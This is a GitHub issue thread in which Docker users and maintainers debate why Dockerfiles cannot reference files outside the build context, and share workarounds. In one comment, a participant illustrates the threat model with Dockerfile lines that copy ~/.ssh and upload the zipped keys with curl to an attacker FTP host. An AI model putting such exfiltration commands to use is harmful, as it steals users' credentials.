  • Your description of the docker's design was helpful. That said, even if the your docker build engine were running on a different machine, wouldn't that untrusted machine still be subject to the permissions of builder's local file system? In other words, if a malicious user operating on the machine where the docker builder service is being run tried to surreptitiously insert an ADD/COPY instruction targeting \mylocalMachine\windows\system32\someprivateThing.dat, the attempt would fail on its own due to a permissions denial when trying to execute the ADD/COPY, amiright?

  • Someone pointed to a link in the documentation about this whole "context" concept. It was informative. Most new users aren't going find that though. They're going to get an "access denied" message when referencing file(s) and folder(s) on their own machine that they know for a fact exist -- and by the nature of the error message will just assume the product is fundamentally broken. If there were at least a helpful error message, perhaps mentioning a keyword like 'context' or better yet, one quick sentence about the unusual folder structuring requirements, it would make a world of difference. Then the user could step back and make a rational decision on whether or not he wants to (a) totally rework the natural existing folder structure he has in place in order to make it Docker centric instead of workflow-centric, or (b) write a program to copy his source files into a standalone Docker-centric folder structure, or (c) move on.

Again, nothing new here. Just recapping what other new users like me have already pointed out. The only surprise from my standpoint is that this has been a confusing stumbling block for new users since 2013 and no action (not even an enhanced error message) has been taken to mitigate.

festus1973 picture festus1973  ·  9 Feb 2017
-3

@festus1973 I think the threat model here is that you download and run some project with a Dockefile which will contain this:

ADD ~/.ssh /root/.ssh
RUN sh -c "zip ssh.zip /root/.ssh; curl -T ssh.zip ftp://hacker.me"

Sure, it's not a threat model for a mass-scale user, but it's absolutely possible for a more targeted attack.
The reason why it has not happened yet is cryptic. Do you always run untrusted code in a virtual machine?

Vanuan picture Vanuan  ·  9 Feb 2017
10

@Vanuan: I'm new to Docker and am totally unfamiliar with Linux commands (I'm on Windows) but if I understand you correctly, it looks like you're presenting a scenario wherein a dockerfile instructs the docker build engine to (1) copy a file or path containing private keys (or some other sensitive info) to a newly built docker container image and then (2) FTP the contents to a malevolent third party.

But how would I get that infected dockerfile into my build environment in the first place? Is the hacker going to email it to me? Let's say he does. Even if he did AND I were stupid enough to accept a file from a random party AND I decided I wanted to execute the contents of said random file, how would I do so? It's not like I a can trigger a build simply by clicking on a dockerfile. It's nothing but a text file. A text file is far safer than a .js, .exe, or countless other filetypes that DO have default file handlers when clicked. No, I'd have to intentionally accept the file, not look at its contents, copy it to a dev environment, and manually run a build on it. That's rather contrived, no?

Seems to me you'd have to have sufficient permissions on the machine(s) housing the dockerfile and source-files in question, as well as the machine running the build. But if you have those permissions already (the ability to read the /.ssh folder, execute the build, etc.) then there are far more effective vectors of attack than attempting to sneak in a bad dockerfile.

I just don't see how this can be spun as a security issue. There may be other valid technical reasons for this 'context' design decision, but I'm just not buying the security angle.

As for whether or not I run untrusted code in a VM... Sure, if it's a throw-away VM not connected to the rest of my network. Otherwise, I use sensible security practices (e.g. not accepting dockerfiles from unknown parties and then attempting to feed them into a critical build process) and I rely on the OS file system security to do its job.

festus1973 picture festus1973  ·  9 Feb 2017
7

I'm with festus1973 in not getting what attack vector this is supposed to counteract. The fear is of instructions being added to the Dockerfile that expose the user's files in an image and potentially in a public repository. But if an attacker can insert such commands into my Dockerfile then apparently my machine is already compromised, and my user files can be siphoned off anyway.

But maybe exactly this scenario once played out not after an attack, but by user error and accident? But for now the answer seems to be to do surgery to our projects to move exactly the files depended on by Docker into a single subdirectory, but no others, a scenario which is likely to lead to people copy-pasting files, or moving files out of their natural context, or having to pass their entire project directory in to the daemon, or other unsavory things like that.

Maybe this would be better as a loud warning with a command-line flag to silence it?

johansen picture johansen  ·  10 Feb 2017
6

Basically docker is either trying to prevent doing work on something people really need and have to do hacky-workarounds for, or they think linux file system security isn't good enough.

dessalines picture dessalines  ·  11 Feb 2017
-8

Please read back https://github.com/docker/docker/issues/2745#issuecomment-278505867 (and https://github.com/docker/docker/issues/2745#issuecomment-35335357). There is no "permission" check here. A Dockerfile cannot refer to files outside the passed build-context because those files are not there.

thaJeztah picture thaJeztah  ·  11 Feb 2017
1

@thaJeztah Good point. I think what's confusing to me is that there are two phases of "adding" a file. There's the file getting included in the build context by virtue of which directory is specified in the docker build command. And then there's the file getting added from the build context to the image via the ADD command in the Dockerfile.

Intuitively I always have expected ADD to add a file both to the build context and to the image. If that's not how it works then that's fine, but it strikes me as potentially very helpful to have a command that does just that. ADD_TO_CONTEXT or something like that.

johansen picture johansen  ·  11 Feb 2017
1

Yes, basically docker build "bundles" the files, and sends them off to the daemon. the Dockerfile is the "script" to apply to those files.

We fully understand that being restricted to having all files in a single location can be limiting; the current "model" makes it very difficult to diverge from that. Things to consider are;

  • an option to provide multiple build contexts (docker build --context-add src=/some/path,target=/path/in/context --context-add src=/some/other/path,target=/some/other/path/in/context -f /path/to/Dockerfile)
  • parsing the Dockerfile client-side, then collect all that's requested, or use an rsync approach (daemon requesting files from the client). Allowing "arbitrary" paths in the Dockerfile would not work though, because you want the build to be "portable", "reproducible" (i.e., we don't want "it works on my machine, because my files happen to be in /home/foo/some/dir", but it breaks on _your_ machine, because they are located in /home/bar/some-other-dir)

So to keep them reproducible, you'd want to have a "context" in which the files can be found in a fixed location.

There's a lot of other improvements that can be made to the builder process, and I know there's people investigating different solutions, creating PoC's. I'm not up to speed on those designs, so it could be entirely different to my "quick" brain dump above :smile:

thaJeztah picture thaJeztah  ·  11 Feb 2017
0

Hi,

Here is how I solved it. Not sure whether it is considered a good practice.

Copy all artifacts in using a separate image and expose the volume.


COPY build/OpenAM-13.5.0.war /artifacts/openam.war
COPY build/configurator.jar /artifacts/configurator.war
COPY build/opendj-3.5.1.zip /artifacts/opendj.zip
VOLUME /artifacts 
CMD ["echo", "done!"]

Then mount the artifacts volume on all dependent images. Here is what my docker-compose looks like:

version: "3"

volumes:
  djdata:
    driver: local
  artifacts:
    driver: local

networks:
  cyberinc:
    driver: bridge
    ipam:
      driver: default
      config:
        -
          subnet: 172.25.0.0/16

services:
  artifacts:
    build:
      context: artifacts/
    networks:
      cyberinc:
        ipv4_address: 172.25.3.10
    volumes:
      - artifacts:/artifacts
  opendj:
    build:
      context: docker-images/opendj
    networks:
      cyberinc:
        ipv4_address: 172.25.3.4
    ports:
      - "1389:1389"
    extra_hosts:
      - "opendj.${OPENDJ_DOMAIN}:127.0.0.1"
    volumes:
      - djdata:/opt/opendj
      - artifacts:/artifacts
    env_file:
      - ./.env
    depends_on:
      - artifacts
    command: ["start"]
sharmaudi picture sharmaudi  ·  26 Feb 2017
7

I used a similar approach, writing a PowerShell script to copy all necessary files to a docker-centric folder structure prior to running the build. It's becoming fairly clear that the whole 'context' bit was a fundamental design mistake that's extremely hard for developers to fix at this stage -- and is thus it's being spun as a "security issue."

festus1973 picture festus1973  ·  26 Feb 2017
36

Just stumbled upon this bug and I am dumbfounded how such a limitation still exists in 2017.

cen1 picture cen1  ·  9 Mar 2017
-13

@cen1 read back the discussion above; https://github.com/docker/docker/issues/2745#issuecomment-279093859, and https://github.com/docker/docker/issues/2745#issuecomment-279098321 give you the answers

thaJeztah picture thaJeztah  ·  9 Mar 2017
9

Me too, man. I eventually gave up on Docker. I'm not claiming that others haven't found viable uses for it. In fact, I know they have and I wish them the best. But from my perspective, everything I try to do with Docker dead-ends in some obscure bug or limitation. Even with seemingly simple tasks, Docker seems to fight me every step of the way. Some of the problems have solutions but they're undocumented and require a fair amount of hacking and trial-and-error to resolve, particularly if one is using Windows Server instead of Linux. I searched around and saw a lot of users, particularly Windows users, giving up in frustration so decided to follow their lead. Perhaps it'll be a more polished, viable solution for me a few years down the road but it's just not there yet.

festus1973 picture festus1973  ·  9 Mar 2017
6

+1 for the allow-parent-folders flag.

libasoles picture libasoles  ·  14 Mar 2017
37

Well, I have a workaround, even if i am not sure it will solve all use cases.
I you have a tree like this:

A
│   README.md 
└───B
│   │   myJson.json
│
└───C
    │   Dockerfile

And you need to access myJson.json from the dockerfile, just write the dockerfile as if you were in A:

FROM my_image
ADD ./B/myJson.json .

And then launch docker specifying the path to the Dockerfile:

docker build -f ./C/Dockerfile  .

That way, it work for me.

Moreover if you use docker compose, you can also do (assuming your docker-compose.yml is in A):

version: '3'
services:
  my_service:
    build:
      context: ./
      dockerfile: ./C/Dockerfile
Romathonat picture Romathonat  ·  29 Mar 2017
0

@Romathonat I can't do that, as docker by default adds everything in the parent directory, which is like 500MB in some of those subfolders for me.

dessalines picture dessalines  ·  29 Mar 2017
0

@dessalines well maybe the dockerignore could help ?

Romathonat picture Romathonat  ·  30 Mar 2017
-7

@Romathonat it doesn't unfortunately. You could add every directory to the dockerignore and it would be just as big. It unavoidably adds everything in the parent directory. Docker states in its official docs that the Dockerfile should be in its own empty directory, ... but then disables relative pathing.

dessalines picture dessalines  ·  30 Mar 2017
0

thought I had a good project folder.

found out sym links and relative pathing doesn't work.

this appears to be just an issue about where to source the files from, so it looks like we have to create two docker files.

FROM scratch
ADD . /app
FROM scratch-image
ADD ./subfolder /app/subfolder

which is depressing

disarticulate picture disarticulate  ·  29 Apr 2017
18

Sad.

minexew picture minexew  ·  5 May 2017
7

So much for running a microservice architecture with multiple repositories and Dockerfiles. :/ Please reopen.

Edit: As a workaround, I created a parent repository and added my other repos as git submodules. I feel like it's a hacky solution though.

zerefel picture zerefel  ·  11 Jun 2017
7

This is something that baffles me also. I just ran into this limitation, and I can't see any reason for it. To say this is a security issue due to malicious people placing bad lines in their Dockerfile and then telling people to clone, build, and publish the image is flimsy reasoning. If I pull a Dockerfile from the Internet (github or whatever) and blindly follow orders without looking at the file to create an image that I subsequently blindly and naively publish to a public repository, I will reap what I deserve. To limit the product for that edge case is specious logic at best.

I am using (and highly recommend if possible) the workaround proposed by @Romathonat which actually works in my case, because I can have central config isolated in its own parent directory, but it's easy to see how that case might not work for everyone.

But, at the core, it's frustrating to see so many people speaking out with user experiences just to get shut down without a fair hearing.

(Added: I'll just leave this here from Moby's README.md):

Usable security: Moby will provide secure defaults without compromising usability.
kitsuneninetails picture kitsuneninetails  ·  30 Jun 2017
12

+1. There is no reason not to make this possible.

morremeyer picture morremeyer  ·  30 Jun 2017
3

@kitsuneninetails - you hit the nail on the head. i would like to use docker, but this issue is show-stopper for me and I suspect many others. I take responsibility for what software I choose to remotely include as part of my own and I don't need/want authoritative hobblings of what I can do with software and which effectively take away my responsibility with the lame excuse/insult that I (and the larger group of my peers) am irresponsible. I build my own dockers from the ground up anyway so that "security" issue does not apply in my case. If they want to continue with this foolishness, they do it at their peril because there are competitors nipping at their heels - I'm just doing my research on https://www.packer.io/intro/why.html - I haven't yet fully understood if it is the replacement I'm looking for but I suspect it will be the docker killer.

ReinsBrain picture ReinsBrain  ·  1 Jul 2017
-10

@mauricemeyer @kitsuneninetails @ReinsBrain As it has already been mentioned numerous times it's not purely a security issue. Docker has a client-server architecture. Docker builder is currently implemented on the server side. So if you want to use files outside the build context you'd have to copy those files to the docker server.

One things docker newbies don't realize is that you can keep Dockerfile separate from build context. I.e. if you have root/proj1/build/Dockerfile, root/proj2/build/Dockerfile, root/common/somecommonfile you can still set build context to root. But the next thing you'll complain about is that the build would take prohibitively long as you now have to copy whole root directory to the machine where the docker server resides.

Vanuan picture Vanuan  ·  2 Jul 2017
0

@ReinsBrain Regarding a security issue consider this:

You're a docker hosting provider (or CI) and allow people to upload their private git repositories with Dockerfiles. Since you want to be as efficient as possible, you implement your service with docker containers. If you allow people to reference any files on your server you'd risk that people would be able to steal private code from each other. How would you solve this?

Vanuan picture Vanuan  ·  2 Jul 2017
0

@ReinsBrain Packer is not a competitor currently. It's a tool to build VM images. Though I can imagine packer to be able to build container images at some point.

Vanuan picture Vanuan  ·  2 Jul 2017
0

@dessalines Why aren't you satisfied with my comment? Doesn't it sound reasonable? Do you have any questions remaining? Do you have a solution to the problem I described?

Vanuan picture Vanuan  ·  2 Jul 2017
3

@Vanuan :

If you allow people to reference any files on your server you'd risk that people would be able to steal private code from each other. How would you solve this?

You run people's dockers inside their own (isolated) containers.

ReinsBrain picture ReinsBrain  ·  2 Jul 2017
0

You run people's dockers inside their own (isolated) containers.

Sorry, I don't understand what's the meaning of "dockers" here. Do you mean Docker in Docker?

Vanuan picture Vanuan  ·  2 Jul 2017
1

I suppose it could be a Docker in Docker but there are many options for virtualization depending on your platform.

ReinsBrain picture ReinsBrain  ·  3 Jul 2017
1

@Vanuan

"So if you want to use files outside the build context you'd have to copy those files to the docker server."

So, can that not be done automatically? If I specify a file out of the context, is it not possible and/or feasible to automatically copy it to the server in order to build it into the image?

"One things docker newbies don't realize is that you can keep Dockerfile separate from build context."

So, the unfortunate haughty attitude to your "newbie" users aside, this is actually what has already been suggested (by @Romathonat above), and as I stated in my own post, this is the solution I am currently using. This works for me. However, if I had multiple, shared config, and my individual docker images were rather big, this would get fairly prohibitive, as it has been stated by others that each docker image would contain the files for every other docker image, even though it would never need them. I could easily see why people would be frustrated by what they could easily see as stonewalling in refusing to work with users' requests and needs and implement this feature.

"You're a docker hosting provider (or CI) and allow people to upload their private git repositories with Dockerfiles."

If I understand this correctly, it seems like this is a case where someone is intentionally setting up a situation just to create this problem. Wouldn't this mean that people are uploading not just Dockerfiles, but actual private information to this central server? Private information a malicious Dockerfile could then supposedly read and include into its own image via an "ADD" command? Because if I can just ADD someone else's Dockerfile, it doesn't seem like a catastrophic issue (although definitely still a security breach), but how would the system be able to "read" that other file in the first place? Is everyone acting under the same user in this CI system (which seems like a major security breach right there)?

It seems like this is a problem the creator of this service should be solving with virtualization, security "jails", system access security, etc., rather than force the other 99.9% of docker users into a strict system just to prevent this one sysadmin from blowing their own toes off.

Secondly, there are many ways for a sysadmin to get around this problem. First off, system access control (if my user has acdcess and/or permissions to a set of files, I can include them, otherwise, I get a read access error, etc.), virtualization via VMs, etc., or other tactics (such as not allowing people to be uploading private information which can then be downloaded by other users via malicious Dockerfiles in the first place), etc. This seems more of an operational/systems problem to me, not a job for a particular tool to be enforcing a strict paradigm just to save greenhorn sysadmins from making security miscues.

kitsuneninetails picture kitsuneninetails  ·  3 Jul 2017
0

I could easily see why people would be frustrated by what they could easily see as stonewalling in refusing to work with users' requests and needs and implement this feature.

Won't you as easily see why maintainers be frustrated?

If I understand this correctly, it seems like this is a case where someone is intentionally setting up a situation just to create this problem.

If you read the docker history, you'd know that this whole "docker" concept was developed in-house (in "dotCloud" then) as a tool to efficiently use server resources. No, it's not "setting up a situation". It's a historic fact.

Wouldn't this mean that people are uploading not just Dockerfiles, but actual private information to this central server

Sure. Just like in any "as-a-service".

Is everyone acting under the same user in this CI system (which seems like a major security breach right there)?

There would be only one docker daemon, so yes. Otherwise you'd need to set up a separate docker daemon for each user which is impossible on one host (so would require actual virtual machine for each user, rendering containers and docker meaningless for that use case).

It is not a security concern for running containers (since kernel isolates them), but it is a security concern when there are no containers yet (when you're building images).

First off, system access control

You're still saying as if each user runs a separate process. It's a server, remember? There's only one user. And one filesystem. That would require implementing application layer of access control on top of the system one.

This seems more of an operational/systems problem to me, not a job for a particular tool to be enforcing a strict paradigm just to save greenhorn sysadmins from making security miscues

You're not forced to use docker to build images. Container image format is currently being standardized. So there are other tools you can build images with. When image is build, push it to image registry so that docker can pull it.

And I'm sure when the build tool is extracted out of the server monolith (#32925) relative path use case would be possible as the builder would run in a separate process under "normal" user.

Vanuan picture Vanuan  ·  3 Jul 2017
2

I'm running into this issue as well in a Go project. Here's how this became a problem for me:

I want to run a container for developing my server locally, which has the following approximate structure:

MyOrg 
└───Dependency
│   │   dep.go
│
└───Main
    │   main.go
    │   depends-on-dep.go
    │   Dockerfile

Inside of my Dockerfile, there are two options I can think of here:

  1. ADD ../ /go/src/MyOrg
  2. Only add the main package and then install the dependencies from the repo

The first option doesn't work because of this bug
The second option isn't only awful, but doesn't work because of moby#6396 (Another multiple-year-old unsolved issue) and MyOrg happens to be bristling with private repos

My only other option is to put all the dependencies into the vendor folder

MyOrg 
└───Dependency
│   │   dep.go
│
└───Main
    │   main.go
    │   depends-on-dep.go
    │   Dockerfile
    └───vendor
        └───Dependency
            │   dep.go

Now if I ever want to update Dependency/dep.go I have to run a script to manually copy Dependency folder into the vendor folder. Just bizarre.

Or alternatively as @Romathonat kindly pointed out, I can enter cd $GOPATH/src and run the command $ docker build -f ./MyOrg/Main/Dockerfile -t MyProj . so now my container is a nice husky ~300mb due to how much is in $GOPATH/src.

warent picture warent  ·  9 Jul 2017
3

Wouldn't it be trivial for Docker to do quick static analysis and detect whether a relative parent directory is being accessed? Then when you try to run or build it, it would abort saying This Dockerfile dangerously accesses parent directories. After making sure you understand the security implications, please run again with the flag --dangerouslyAllowParentDirectories and then add those relative directories to the build context

warent picture warent  ·  9 Jul 2017
0

@warent It looks like you want to link statically with some library?
For production image, I see 3 solutions:

1) Treat it as a thirdparty library with its own release cycle

  • Publish Dependency using go package manager
  • In Dockerfile fetch all dependencies using go package manager

2) Treat it as a part of your application with synchronous release cycle

  • Move Dependency to Main
  • Add additional Dockerfile if you want to release Dependency separately

3) Move Dockerfile to MyOrg

For development image there's a 4th solution:

4) Just use docker-compose

  • use image with Go build tools
  • mount MyOrg to /src
  • use go command to build normally as you would without docker
Vanuan picture Vanuan  ·  10 Jul 2017
3

Your #2 is a non-solution if the Dependency is used by more than one MyOrg projects, which, if I understand correctly, is the entire point of @warent's setup.

3 also breaks once there is more than one top-level project.

That really leaves us with just solution #1, which is a lot of hassle for something that should be a non-issue.

Virtually every build system on the planet supports this setup (e.g. CMake's add_subdirectory actually lets you ascent into the parent directory etc.); Docker is the special needs child here :)

minexew picture minexew  ·  10 Jul 2017
0

a lot of hassle for something that should be a non-issue.

Dependency management is always an issue. Often there's a temptation to dump everything into one repository (like they do at Facebook and Google), but it's not an option in the open source community. And when you have multiple repositories you must either use git clone or some other package source.

every build system on the planet supports this setup

The thing is, docker is not a build system. It's not designed as a build tool. Build functionality is only a necessity and it has very limited capability. You can't use multiple Dockerfiles to build one image (without intermediate registry step), you can't import Dockerfile (you can only use other image as a base), there were no multistage builds until recently. It's not a replacement for CMake.

So yeah, if you need a build tool, use CMake (or docker-compose run) and then just add artifacts to the result image.

Vanuan picture Vanuan  ·  10 Jul 2017
7

So why can't we do this? A tool should not be enforcing it's own ideology onto it's users when it's designed to be as versatile as possible.

davidawad picture davidawad  ·  28 Jul 2017
0

+1.

Basically I have a JAR file for instrumentation that needs to be in every single micro-service, but is quite large. Due to change in infrastructure (Rancher for orchestration instead of ad-hoc docker scripts) it will no longer be "easy" for me to mount the JAR for instrumentation in the target container at runtime, so I need to supply it to Dockerfile and copy it inside the container at build time.

Well, the JAR is quite big so it is in the parent directory of all the micro-services directories (each containing their own Dockerfile)

Due to this "limitation" I am force to copy/clone a 50MB+ JAR into every simple micro-service (10+) directory... Not healthy for my co-workers machines or the Git repository.

Providing a flag such as --include-context="/path/to/file.ext" to docker build would not be outside of the realm of possibility. The Dockerfile would have to be pre-processed before bundling the context to analyse dependencies from outer directories which would then be added to the context bundle, right?

In my mind this does not look like a very far-fetched feature-request - but rather quite sensible usage.

For those that want a hotfix for now:
Wrap the docker build command in a script which copies all dependencies to the build directory and deletes them afterwards. Ugly and inefficient, yet reasonable...

cp ../docker-files/instrumentation.jar instrumentation.jar
docker build -t service-name .
rm instrumentation.jar

Cheers
Dan

metabrain picture metabrain  ·  2 Aug 2017
0

Just FYI to anyone here, the best solution I have found so far, was to simply copy the Dockerfile to the root of the project and give the filename a uuid. after building, just delete the uuid Dockerfile. worst case is the Dockerfile doesn't get deleted, but it's a uuid, so it shouldn't really matter.

I tried symlinks up the wazooo, did not work. Copying the file to the root of the project the uuid isn't as pretty as symlinks, but it does work.

ORESoftware picture ORESoftware  ·  3 Aug 2017
1

You can just build the Docker context directly:

# Tar the current directory, then change to another directory and add it to the tar
tar -c ./* -C $SOME_OTHER_DIRECTORY some_files_from_other_directory| docker build -

This is basically what https://github.com/six8/dockerfactory does

six8 picture six8  ·  3 Aug 2017
0

Basically I have a JAR file for instrumentation that needs to be in every single micro-service, but is quite large. Due to change in infrastructure (Rancher for orchestration instead of ad-hoc docker scripts) it will no longer be "easy" for me to mount the JAR for instrumentation in the target container at runtime, so I need to supply it to Dockerfile and copy it inside the container at build time.

If this JAR file is static you shouldn't include it to your git repository. Here's a proper way:

  1. Build a base image (e.g. custom-java) with JAR file included
  2. Create a Jenkins (or other CI) pipeline where you build and push the custom-java image to the registry
  3. On each microservice's Dockerfile use base JAR image: FROM my-registry/custom-java

Alternatively, you could just put the JAR file to some http server and use this in your Dockerfile:

ADD http://my-server/custom.jar

Vanuan picture Vanuan  ·  3 Aug 2017
3

You can use multi-stage builds;

Create a Docker image for your packages (or build several of such images)

Dockerfile.packages:

FROM scratch
COPY instrumentation.jar /

Build it;

docker build -t my-packages:v1.0.1 -f Dockerfile.packages .

Now, every image that needs these packages can include them as a build-stage. This gives the advantage over a "base image" that you can "mix and match" what you need;

FROM my-packages:v1.0.1 AS packages

FROM nginx:alpine
COPY --from=packages /instrumentation.jar /some/path/instrumentation.jar

Another image that also wants this package, but uses a different base-image;

FROM my-packages:v1.0.1 AS packages

FROM mysql
COPY --from=packages /instrumentation.jar /some/path/instrumentation.jar

Or several of your "package" images

FROM my-packages:v1.0.1 AS packages
FROM my-other-packages:v3.2.1 AS other-packages

FROM my-base-image
COPY --from=packages /instrumentation.jar /some/path/instrumentation.jar
COPY --from=other-packages /foobar-baz.tgz /some/other-path/foobar-baz.tgz
thaJeztah picture thaJeztah  ·  3 Aug 2017
1

I tried symlinks up the wazooo, did not work. Copying the file to the root of the project the uuid isn't as pretty as symlinks, but it does work.

@ORESoftware The trick I've used in the past is to use symlinks and then rsync everything with symlink resolution to a separate folder for building. It doesn't really work if you have really large files in your build, but for most use cases it's a workaround that can get the job done.

daveisfera picture daveisfera  ·  3 Aug 2017
6

+1. This looks like a very basic and useful feature. Sharing code/library between containers is a challenging task, and this limitation makes it worse.

rulai-huajunzeng picture rulai-huajunzeng  ·  3 Aug 2017
0

@daveisfera thanks, I will look into that...I have to support generic building of projects for the purposes of library code, so the stupid trick of copying the Dockerfile to the root of the project is the only lightweight thing I can think of, where the only thing being copied is the Dockerfile itself. Seems dumb but works lol.

In the docker container, I have to copy all the project's files to the container, but if the dependencies haven't changed then those don't need to get copied or installed. So the best case shortest path is the time it takes to copy the project files. I am totally open to better ways of doing this but rsync is probably too heavy-handed for my use case.

ORESoftware picture ORESoftware  ·  4 Aug 2017
21

This is extremely unfortunate. At this point, it's physically impossible for me to add any new ideas, since all of them have already been brought up. But for some reason, the Docker people seem to keep complaining about security aspects.

This makes less than zero sense: just add an --enable-unsafe-parent-directory-includes flag, which is disabled by default. Boom: everyone is happy. Can we stop pretending that security is a concern here?

If the attack vector is that an attacker somehow convinced me to run docker build --enable-unsafe-parent-directory-includes on their Dockerfile, then I think I'm stupid enough that they also could have convinced me to run rm -rf ~.

raxod502 picture raxod502  ·  9 Aug 2017
0

If the attack vector is that an attacker somehow convinced me to run docker build --enable-unsafe-parent-directory-includes on their Dockerfile, then I think I'm stupid enough that they also could have convinced me to run rm -rf ~.

I think you're missing one important difference: docker runs in a superuser context.
And no, you're not supposed to be stupid to be convinced to clone some project from GitHub and run docker-compose up.

And yes, I also think security isn't the main issue here.

Vanuan picture Vanuan  ·  11 Aug 2017
0

LXDock is interesting: https://lxdock.readthedocs.io/en/stable/provisioners/index.html#provisioners
Note the warning - duly noted and highly appreciated :)

ReinsBrain picture ReinsBrain  ·  20 Aug 2017
2

5 years later and docker still issues this cryptic error message that rivals ones from nuget.

How about at least putting in "Even though you are in path X when you issued the docker command, and your dockerfile has a path relative to X, and you have specified a working directory in the dockerfile, docker is going to be working in path Y (ps. u r stupid noob)"

At least I think that's what the obstacle preventing me from completing a basic walkthrough. This tech seems great and all, but I shouldn't need to spend a few weeks researching the ins and outs and dealing with 5 year old bugs like this just to try it.

StingyJack picture StingyJack  ·  3 Nov 2017
0

This appears to still be a bug, at least is presenting itself today in what feels like a very routine use-case.

jonbronson picture jonbronson  ·  14 Nov 2017
0

It certainly feels at first. But not after you learn how to mount your source and build directories, which is a recommended use case for development. You aren't supposed to rebuild your images on every source change.

When you're comfortable with development use case, you can proceed to production use case, at which point you create Dockerfile-production and use context to point docker builder at the root of your project.

Then you realize that not all the files in your project are required for production. You begin to optimize it by creating build image and using build artifacts folder as a context for you production build. Then you learn about multistage builds and which point you're comfortable with a setup you have.

If you need to put in your image something else from your HOME folder, like your private ssh keys (not a brightest idea), you can copy them to your project dir (surely you're not worried about security) or even commit them to git.

Vanuan picture Vanuan  ·  15 Nov 2017
0

I just ran into this issue as well.

Is there a reasonable workaround? I just want to mount a folder that is not in the docker folder...

grrava picture grrava  ·  22 Nov 2017
0

All this "mount" talk and "Home folders". If anyone is going to fix the error to be more clear, please remember that some of us have C: drives and %USERPROFILE%.

StingyJack picture StingyJack  ·  22 Nov 2017
0

The way it works on Windows is network shares which is kind of a mount.

Vanuan picture Vanuan  ·  23 Nov 2017
0

Windows has actually had mounting for a long time, its just transparent to users unlike *nix, I just didn't want to be further confused by *nix specific messages while trying docker out on windows.

Why would I create a network share to run a docker image on the host running on my local machine? That seems "extra", but if the error message said that was the problem I would fix it and not come bothering anyone.

StingyJack picture StingyJack  ·  23 Nov 2017
0

If you're talking about Docker on Windows, it still uses linux in a VM.
untitled drawing 2

Vanuan picture Vanuan  ·  23 Nov 2017
0

When you run docker build it actually zips your src folder and transfer it to the docker server which executes commands from your Dockerfile.

Vanuan picture Vanuan  ·  23 Nov 2017
3

It looks like there are some people who want to reference any files from the Dockerfile. But Dockerfile parsing is done on the docker server. So there's no way it could know which files are referenced.

There are some local image builders, but you have to install them yourself. Plus they'll probably still need to be run in the VM. And yet, you have to push the images you build to the docker server.

Some people are asking to change message from "Forbidden path" to something more understandable.
Does the message "You can't reference files outside the build context" make more sense to you?

Vanuan picture Vanuan  ·  23 Nov 2017
0

When you run docker build it actually zips your src folder and transfer it to the docker server which executes commands from your Dockerfile.

So if I have a dockerfile like this...

FROM microsoft/aspnet:4.7
ARG source
WORKDIR /inetpub/wwwroot
COPY ${source:-obj/Docker/publish} .

... and run a command to publish a new empty Asp.net (not core) web app (dockerfile inside folder) ...
PS C:\WINDOWS\system32> docker build C:\Users\astanton\source\repos\WebApplication3

... the COPY failed error that crops up (that talks about a path I have specified nowhere) is talking about it from the context of the "Docker Server" box in the picture above?

COPY failed: GetFileAttributesEx \\?\C:\WINDOWS\TEMP\docker-builder951625405\obj\Docker\publish: The system cannot find the file specified.

I did try changing the COPY to various relative and absolute paths, but nothing stopped producing that that error, or caused a different one to happen.

I'm only on this thread as its the only place I could find that had mention of the random tempdocker-builderNNNNNNNN folder that does get created locally on my windows pc (maybe on the Docker Server as well. but I can't tell). The local folder is removed almost immediately. If what I'm describing isnt for the same issue as this very long and meandering thread, please say so and I'll open a new issue.

Does the message "You can't reference files outside the build context" make more sense to you?

No, because of two things

  • despite the name of the command I am executing, I'm not compiling anything. I'm deploying something already built to a container to create an image.
  • It doesnt tell me what the build context _is_. "Build context" is meaningless without some concrete bit of info like the context's path or environment variable or the referenced file paths.
StingyJack picture StingyJack  ·  27 Nov 2017
2

I'm not compiling anything

Well, you're compiling an image. Even though you have already "built" a thing you want to put into an image, you have not built an image.

It doesnt tell me what the build context is.

Well, error messages should not replace documentation.
screenshot from 2017-11-27 03 55 28

Vanuan picture Vanuan  ·  27 Nov 2017
0
FROM microsoft/aspnet:4.7
ARG source
WORKDIR /inetpub/wwwroot
COPY ${source:-obj/Docker/publish} .
PS C:\WINDOWS\system32> docker build C:\Users\astanton\source\repos\WebApplication3
COPY failed: GetFileAttributesEx \\?\C:\WINDOWS\TEMP\docker-builder951625405\obj\Docker\publish: The system cannot find the file specified.

I see what you're trying to do. It looks like you have neither read the Dockerfile reference nor docker build help.

  1. You have ARG source specified but you haven't provided a value for it, so the default value of obj/Docker/publish kicks in
  2. First argument of docker build command is a build context. You would know what is a build context if you had read how to use docker build before running this command.
  3. The error essentially tells you that there's no obj\Docker\publish in C:\Users\astanton\source\repos\WebApplication3\.
Vanuan picture Vanuan  ·  27 Nov 2017
0

Also, it looks like you're running Windows containers (native docker server) which do not require VM.
This technology is still experimental, so you may experience a bug.

Vanuan picture Vanuan  ·  27 Nov 2017
6

+1 for allowing something like 'COPY ../../src'

I'm sorry, but any environment that pushes developers to use so clumsy project structures will never mature and leave the mickey-mouse stage. This is not how successful products evolve and no PR hype can be a saver for long.

Docker team, please propose some viable solution.

accetto picture accetto  ·  30 Dec 2017
0

It looks like you have neither read the Dockerfile reference nor docker build help.

@vanuan - I should not need to digest tomes of information just to "get started". I already had to get permission to temporarily uninstall antivirus that was interfering with docker.

The paths used in the build context shouldn't be somewhere other than where I'm executing the command or the program folders. A common temp location is ok too, but _only if it doesn't require additional permissions_, which I think is what you are saying this needs.

StingyJack picture StingyJack  ·  31 Dec 2017
2

Super clean and direct and works fine, at least for me:
https://www.jamestharpe.com/include-files-outside-docker-build-context/

vilas27 picture vilas27  ·  3 Jan 2018
2

@vilas27 Yes, this is tutorial describes how to set a context directory.

Which implies that the problem here is that docker build --help is not descriptive enough:

docker build --help

Usage:  docker build [OPTIONS] PATH | URL | -

Build an image from a Dockerfile

People should refer to extended description on the website:

https://docs.docker.com/engine/reference/commandline/build/

The docker build command builds Docker images from a Dockerfile and a “context”. A build’s context is the set of files located in the specified PATH or URL. The build process can refer to any of the files in the context. For example, your build can use a COPY instruction to reference a file in the context.

The URL parameter can refer to three kinds of resources: Git repositories, pre-packaged tarball contexts and plain text files.

Reading which it's quite easy to grasp what "Forbidden path" really means. It doesn't have anything to do with permissions.

@StingyJack

I should not need to digest tomes of information just to "get started".

Writing Dockerfiles for your project doesn't sound "get started" to me. It requires quite an advanced knowledge. Getting started tutorial describes setting up very simple project that doesn't require any prior knowledge. But if you need to setup anything more complex you must know how Docker works. And yes, it requires quite a lot of time to figure out.

Vanuan picture Vanuan  ·  3 Jan 2018
0

